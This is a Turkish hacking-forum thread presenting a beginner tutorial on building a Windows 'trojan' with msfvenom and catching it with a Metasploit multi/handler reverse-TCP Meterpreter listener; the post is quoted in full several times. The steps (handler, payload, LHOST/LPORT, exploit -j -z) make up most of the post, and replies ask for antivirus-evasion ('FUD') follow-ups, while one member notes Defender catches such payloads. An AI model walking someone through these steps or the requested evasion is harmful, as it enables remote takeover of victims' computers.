Metasploit ve MsfVenom ile Trojan oluşturma

Q

quarexizi

Yeni üye
7 Tem 2023
15
10
metasploit-framework-logo.svg

Metasploit Nedir?
Metasploit, Ruby dili ile yazılmış açık kaynak kodlu bir “Penetrasyon Test” aracıdır. Metasploit Framework mevcut cihazlar üzerinde bulunan zaafiyetlerin exploit edimesi amacıyla geliştirilmiş bir framework'tür.

Metasploit Framework Nedir?
Metasploit Framework Ruby dili ile yazılmış ve siber güvenlik sektöründe en çok kullanılan açık kaynak kodlu keşif , tarama ve sızma testi aracıdır. Metasploit Framework içerisinde 2000+ civarı exploit barındırmaktadır.


Metasploit'te Msfvenom Nedir?
Msfvenom, standart komut satırı seçeneklerini içerir. Android, Windows, Unix ve daha pek çok platform için faydalı payloadlar üretebiliriz. Temel olarak, Metasploit'te bulunan tüm çeşitli shell kodlarının türlerini oluşturmak ve çıktı almak için kullanılır.

UYARI : ( BÜTÜN FOTOĞRAFLAR İNTERNETTEN ALINMIŞTIR )

MsfConsole başlatma ve ayarları yapmak
öncelikle terminalimizi açıp msfconsole yazıyoruz bu bize kullanıcağımız frameworkü açacak.

msfconcole.png

msfconsole açtığımıza göre sıradaki işlem trojan yani virüsünümüzü oluşturmaya geldi.

MsfVenom İle Trojan Oluşturma
öncelikle yeni bir terminal açıp terminalimize şu kodu yazıyoruz.

evading-anti-virus-detection-using-msfvenom-tool-02.jpg

Siz tabikiede LHOST yerine kendi IP nizi giriceksiniz eğer kendi IP nize bakmayı bilmiyorsanız yeni bir terminal açıp ifconfig yazıp ip'nizi öğrenebilirsiniz. Ip'nizi yazdıktan sonra entera basıp trojanimizi oluşturuyoruz.

ifconfig-command.png


Trojanimizi oluşturduktan sonra msfconsole'da ayarlarımızı yapmaya geldi sıra.

why-am-getting-multi-handler-instead-handler-only-metasploit-window.w1456.jpg

öncelikle ( use exploit/multi/handler ) yazıyoruz.

Bundan sonra komutlarımız şu şekilde
( LHOST yerine ifconfig yazınca çıkan ıp'nizi giriyorsunuz - LPORT yerine istediğiniz sayıyı verebilirsiniz Örnek : 8080,5050,4040,4444 vb. )

  • set payload windows/meterpreter/reverce_tcp
  • set LHOST sizin IP'niz
  • set LPORT istediğini verebilirsiniz
  • ( Bundan sonra show options diyerek ayarlarımızı kontrol ediyoruz ayarlarımız doğru ise aşağıdaki komutu çalıştırıp dinlemeye alıyoruz )
  • exploit -j -z






 
QuatrexDefacer

QuatrexDefacer

Katılımcı Üye
15 Eki 2022
612
394
Baku
quarexizi' Alıntı:
metasploit-framework-logo.svg

Metasploit Nedir?
Metasploit, Ruby dili ile yazılmış açık kaynak kodlu bir “Penetrasyon Test” aracıdır. Metasploit Framework mevcut cihazlar üzerinde bulunan zaafiyetlerin exploit edimesi amacıyla geliştirilmiş bir framework'tür.

Metasploit Framework Nedir?
Metasploit Framework Ruby dili ile yazılmış ve siber güvenlik sektöründe en çok kullanılan açık kaynak kodlu keşif , tarama ve sızma testi aracıdır. Metasploit Framework içerisinde 2000+ civarı exploit barındırmaktadır.


Metasploit'te Msfvenom Nedir?
Msfvenom, standart komut satırı seçeneklerini içerir. Android, Windows, Unix ve daha pek çok platform için faydalı payloadlar üretebiliriz. Temel olarak, Metasploit'te bulunan tüm çeşitli shell kodlarının türlerini oluşturmak ve çıktı almak için kullanılır.

UYARI : ( BÜTÜN FOTOĞRAFLAR İNTERNETTEN ALINMIŞTIR )

MsfConsole başlatma ve ayarları yapmak
öncelikle terminalimizi açıp msfconsole yazıyoruz bu bize kullanıcağımız frameworkü açacak.

msfconcole.png

msfconsole açtığımıza göre sıradaki işlem trojan yani virüsünümüzü oluşturmaya geldi.

MsfVenom İle Trojan Oluşturma
öncelikle yeni bir terminal açıp terminalimize şu kodu yazıyoruz.

evading-anti-virus-detection-using-msfvenom-tool-02.jpg

Siz tabikiede LHOST yerine kendi IP nizi giriceksiniz eğer kendi IP nize bakmayı bilmiyorsanız yeni bir terminal açıp ifconfig yazıp ip'nizi öğrenebilirsiniz. Ip'nizi yazdıktan sonra entera basıp trojanimizi oluşturuyoruz.

ifconfig-command.png


Trojanimizi oluşturduktan sonra msfconsole'da ayarlarımızı yapmaya geldi sıra.

why-am-getting-multi-handler-instead-handler-only-metasploit-window.w1456.jpg

öncelikle ( use exploit/multi/handler ) yazıyoruz.

Bundan sonra komutlarımız şu şekilde
( LHOST yerine ifconfig yazınca çıkan ıp'nizi giriyorsunuz - LPORT yerine istediğiniz sayıyı verebilirsiniz Örnek : 8080,5050,4040,4444 vb. )

  • set payload windows/meterpreter/reverce_tcp
  • set LHOST sizin IP'niz
  • set LPORT istediğini verebilirsiniz
  • ( Bundan sonra show options diyerek ayarlarımızı kontrol ediyoruz ayarlarımız doğru ise aşağıdaki komutu çalıştırıp dinlemeye alıyoruz )
  • exploit -j -z






Genişletmek için tıkla ...
eline saglk bu konu unutulmusdu
 
rootibo

rootibo

Kıdemli Üye
13 Mar 2023
2,168
1,460
quarexizi' Alıntı:
metasploit-framework-logo.svg

Metasploit Nedir?
Metasploit, Ruby dili ile yazılmış açık kaynak kodlu bir “Penetrasyon Test” aracıdır. Metasploit Framework mevcut cihazlar üzerinde bulunan zaafiyetlerin exploit edimesi amacıyla geliştirilmiş bir framework'tür.

Metasploit Framework Nedir?
Metasploit Framework Ruby dili ile yazılmış ve siber güvenlik sektöründe en çok kullanılan açık kaynak kodlu keşif , tarama ve sızma testi aracıdır. Metasploit Framework içerisinde 2000+ civarı exploit barındırmaktadır.


Metasploit'te Msfvenom Nedir?
Msfvenom, standart komut satırı seçeneklerini içerir. Android, Windows, Unix ve daha pek çok platform için faydalı payloadlar üretebiliriz. Temel olarak, Metasploit'te bulunan tüm çeşitli shell kodlarının türlerini oluşturmak ve çıktı almak için kullanılır.

UYARI : ( BÜTÜN FOTOĞRAFLAR İNTERNETTEN ALINMIŞTIR )

MsfConsole başlatma ve ayarları yapmak
öncelikle terminalimizi açıp msfconsole yazıyoruz bu bize kullanıcağımız frameworkü açacak.

msfconcole.png

msfconsole açtığımıza göre sıradaki işlem trojan yani virüsünümüzü oluşturmaya geldi.

MsfVenom İle Trojan Oluşturma
öncelikle yeni bir terminal açıp terminalimize şu kodu yazıyoruz.

evading-anti-virus-detection-using-msfvenom-tool-02.jpg

Siz tabikiede LHOST yerine kendi IP nizi giriceksiniz eğer kendi IP nize bakmayı bilmiyorsanız yeni bir terminal açıp ifconfig yazıp ip'nizi öğrenebilirsiniz. Ip'nizi yazdıktan sonra entera basıp trojanimizi oluşturuyoruz.

ifconfig-command.png


Trojanimizi oluşturduktan sonra msfconsole'da ayarlarımızı yapmaya geldi sıra.

why-am-getting-multi-handler-instead-handler-only-metasploit-window.w1456.jpg

öncelikle ( use exploit/multi/handler ) yazıyoruz.

Bundan sonra komutlarımız şu şekilde
( LHOST yerine ifconfig yazınca çıkan ıp'nizi giriyorsunuz - LPORT yerine istediğiniz sayıyı verebilirsiniz Örnek : 8080,5050,4040,4444 vb. )

  • set payload windows/meterpreter/reverce_tcp
  • set LHOST sizin IP'niz
  • set LPORT istediğini verebilirsiniz
  • ( Bundan sonra show options diyerek ayarlarımızı kontrol ediyoruz ayarlarımız doğru ise aşağıdaki komutu çalıştırıp dinlemeye alıyoruz )
  • exploit -j -z






Genişletmek için tıkla ...
Merhaba alinti konuya benziyor ama yinede elinize saglik
Encode Ve Fudlu rat yapmayi gosterirseniz iyi olur
ilk postunuza gore basarili konu elinize saglik
 
Rebelkan

Rebelkan

Blue Team Lider Yrd.
12 Şub 2019
1,848
926
Maalesef gerçek hayatta senaryolarında işe yaramazlar. En basitinden bir defender bile yakalar. Bırak ki bir kurumu hacklemeyi.

Fudlamanında iki gün ömrü olur, sonra yine yakalanır. Gelişmiş av'ler programın yaptığı hareketleri takip ederler.

Yinede de emek vermişsin. 👍
 
Q

quarexizi

Yeni üye
7 Tem 2023
15
10
Rebelkan' Alıntı:
Maalesef gerçek hayatta senaryolarında işe yaramazlar. En basitinden bir defender bile yakalar. Bırak ki bir kurumu hacklemeyi.

Fudlamanında iki gün ömrü olur, sonra yine yakalanır. Gelişmiş av'ler programın yaptığı hareketleri takip ederler.

Yinede de emek vermişsin. 👍
Genişletmek için tıkla ...
Bu alana yeni başlayanlara güzel bir örnek olacağını düşündüm, görüşlerin ve fikirlerin için teşekkür ederim :)
 
Ç

Ç1nk0

Üye
6 Tem 2023
77
52
Konunun devamı olur ise güzel olur, bu trojanı oluşturduk ama var olan bir virüs tarama programından nasıl şüphesiz geçiririz gibi bir konu, fudlamayı gösteren bir konu.

Elinize sağlık.
 
ertan074

ertan074

Üye
13 May 2021
126
60
quarexizi' Alıntı:
metasploit-framework-logo.svg

Metasploit Nedir?
Metasploit, Ruby dili ile yazılmış açık kaynak kodlu bir “Penetrasyon Test” aracıdır. Metasploit Framework mevcut cihazlar üzerinde bulunan zaafiyetlerin exploit edimesi amacıyla geliştirilmiş bir framework'tür.

Metasploit Framework Nedir?
Metasploit Framework Ruby dili ile yazılmış ve siber güvenlik sektöründe en çok kullanılan açık kaynak kodlu keşif , tarama ve sızma testi aracıdır. Metasploit Framework içerisinde 2000+ civarı exploit barındırmaktadır.


Metasploit'te Msfvenom Nedir?
Msfvenom, standart komut satırı seçeneklerini içerir. Android, Windows, Unix ve daha pek çok platform için faydalı payloadlar üretebiliriz. Temel olarak, Metasploit'te bulunan tüm çeşitli shell kodlarının türlerini oluşturmak ve çıktı almak için kullanılır.

UYARI : ( BÜTÜN FOTOĞRAFLAR İNTERNETTEN ALINMIŞTIR )

MsfConsole başlatma ve ayarları yapmak
öncelikle terminalimizi açıp msfconsole yazıyoruz bu bize kullanıcağımız frameworkü açacak.

msfconcole.png

msfconsole açtığımıza göre sıradaki işlem trojan yani virüsünümüzü oluşturmaya geldi.

MsfVenom İle Trojan Oluşturma
öncelikle yeni bir terminal açıp terminalimize şu kodu yazıyoruz.

evading-anti-virus-detection-using-msfvenom-tool-02.jpg

Siz tabikiede LHOST yerine kendi IP nizi giriceksiniz eğer kendi IP nize bakmayı bilmiyorsanız yeni bir terminal açıp ifconfig yazıp ip'nizi öğrenebilirsiniz. Ip'nizi yazdıktan sonra entera basıp trojanimizi oluşturuyoruz.

ifconfig-command.png


Trojanimizi oluşturduktan sonra msfconsole'da ayarlarımızı yapmaya geldi sıra.

why-am-getting-multi-handler-instead-handler-only-metasploit-window.w1456.jpg

öncelikle ( use exploit/multi/handler ) yazıyoruz.

Bundan sonra komutlarımız şu şekilde
( LHOST yerine ifconfig yazınca çıkan ıp'nizi giriyorsunuz - LPORT yerine istediğiniz sayıyı verebilirsiniz Örnek : 8080,5050,4040,4444 vb. )

  • set payload windows/meterpreter/reverce_tcp
  • set LHOST sizin IP'niz
  • set LPORT istediğini verebilirsiniz
  • ( Bundan sonra show options diyerek ayarlarımızı kontrol ediyoruz ayarlarımız doğru ise aşağıdaki komutu çalıştırıp dinlemeye alıyoruz )
  • exploit -j -z






Genişletmek için tıkla ...
Elinize Emeğinize Sağlık açık ve öz bir anlatım olmuş Tşkler
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.